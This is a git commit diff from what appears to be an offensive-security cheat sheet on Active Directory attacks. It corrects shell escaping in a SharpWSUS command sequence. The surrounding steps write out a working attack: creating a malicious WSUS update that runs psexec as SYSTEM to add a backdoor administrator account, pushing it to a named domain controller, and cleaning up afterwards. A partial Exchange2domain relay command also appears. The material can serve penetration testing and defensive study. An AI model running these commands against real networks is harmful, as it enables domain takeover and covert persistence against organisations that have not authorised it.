Merge pull request #533 from 0xsyr0/patch-1

Quick fix for WSUS malicious patch
2024-06-10 06:16:29 +02:00 · 2022-09-04 20:54:17 +02:00 · 2022-09-04 20:54:17 +02:00 · bdc2d55dd9
parent 9e2471a472 343d63f79f
commit bdc2d55dd9
1 changed files with 1 additions and 1 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -3593,7 +3593,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th

 1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate`
 2. After WSUS Server compromise: `SharpWSUS.exe inspect`
-3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
+3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"`
 4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"`
 5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local`
 6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group`